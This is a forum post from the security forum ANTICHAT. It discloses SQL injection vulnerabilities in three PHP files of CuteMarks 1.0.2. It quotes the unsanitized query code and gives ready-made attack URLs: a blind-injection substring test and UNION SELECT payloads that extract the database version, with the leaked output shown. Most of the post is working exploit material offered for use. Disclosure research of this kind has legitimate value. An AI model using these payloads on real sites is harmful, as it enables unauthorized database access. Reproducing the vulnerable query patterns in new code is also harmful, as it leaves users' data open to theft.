ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Blind SQL inj
(если условие верно, то редирект!)

link_href.php

PHP код:

include "./include/config.inc";
include "./include/cm_functions.inc";

#Get the superglobal variable(s) before using them:
$lnk_id = $_GET['lnk_id'];

# Make database connection and construct admin main screen
mysql_pconnect("$db_address:$db_port", $db_user, $db_password) or db_error;
mysql_select_db($db_name) or db_error;

# An empty database produces a special message
$sql = "SELECT lnk_url, lnk_hits FROM cm_links WHERE lnk_id=$lnk_id";
$return = mysql_query($sql) or db_error;
$row = mysql_fetch_array($return) or db_error;
$url = $row[0];
$hits = $row[1] + 1;
$sql = "UPDATE cm_links SET lnk_hits = $hits WHERE lnk_id=$lnk_id";
mysql_query($sql) or db_error;
header("Location: $url"); 


include/cm_functions.php

PHP код:

function db_error($exit_flag) {
  echo "A database error occured, please try again<br>";
  $exit_flag AND exit; 


Result:
http://localhost/cutemarks_1-0-2/link_href.php?lnk_id=[sql]
http://localhost/cutemarks_1-0-2/link_href.php?lnk_id=1+and+4=substring%28version%2 8%29,1,1%29--+

SQL inj

PHP код:

include "./include/config.inc";
include "./include/template.inc";
$lnk_id = $_GET['lnk_id'];

# Load the template, retreive information from the database and fill
# in the template
mysql_pconnect("$db_address:$db_port", $db_user, $db_password) or db_error;
mysql_select_db($db_name) or db_error;
$sql  = "SELECT lnk_parent_id, lnk_name FROM cm_links WHERE lnk_id = $lnk_id";
$result = mysql_query($sql) or db_error;
$row = mysql_fetch_array($result) or db_error;
$tpl = new Template("./$tpl_path", "remove");
$tpl->set_file("admin_move_lnk", "admin_move_lnk.tpl");
$tpl->set_block("admin_move_lnk", "cat_list", "foo");
$tpl->set_var(array ("CSS_FILE"        => $css_file,
                     "lnk_name"        => htmlentities($row[1]),
                     "node_exp"        => $node_exp,
                     "lnk_id"          => $lnk_id ));
$pID = $row[0];

# Create a pulldown form element with all available categories
$sql = "SELECT cat_id, cat_name FROM cm_categories ORDER BY cat_name";
$result = mysql_query($sql) or db_error;
while ($row = mysql_fetch_array($result)) {
  $tpl->set_var(array("cat_id"    => $row[0],
                      "cat_label" => $row[1]));
  if ($row[0] == $pID) {
    $tpl->set_var("cat_selected", "selected");
  } else {
    $tpl->set_var("cat_selected", "");
  }
  $tpl->parse("foo", "cat_list", TRUE);
}
$tpl->pparse("out", "admin_move_lnk"); 


Result:
http://localhost/cutemarks_1-0-2/admin_move_lnk.php?lnk_id=[sql]
http://localhost/cutemarks_1-0-2/admin_move_lnk.php?lnk_id=-1+union+select+1,version%28%29

Цитата:

You want to move the link "5.1.40-community" to a new category. Please choose one of the available categories from the list and submit the change.

SQL inj
admin_rename_cat.php

PHP код:

include "./include/config.inc";
include "./include/template.inc";

$cat_id = $_GET['cat_id'];
$node_exp = $_GET['node_exp'];

# Load the template, retreive information from the database and fill
# in the template
mysql_pconnect("$db_address:$db_port", $db_user, $db_password) or db_error;
mysql_select_db($db_name) or db_error;
$sql  = "SELECT cat_name FROM cm_categories WHERE cat_id = $cat_id";
$result = mysql_query($sql) or db_error;
$row = mysql_fetch_array($result) or db_error;
$tpl = new Template("./$tpl_path", "remove");
$tpl->set_file("admin_rename_cat", "admin_rename_cat.tpl");
$tpl->set_var(array ("CSS_FILE"        => $css_file,
                     "cat_name"        => htmlentities($row[0]),
                     "node_exp"        => $node_exp,
                     "cat_id"          => $cat_id ));
$tpl->pparse("out", "admin_rename_cat"); 


Result:
http://localhost/cutemarks_1-0-2/admin_rename_cat.php?cat_id=[sql]
http://localhost/cutemarks_1-0-2/admin_rename_cat.php?cat_id=-1+union+select+version%28%29--+
Дырявый как # дальше не хочеться смотреть!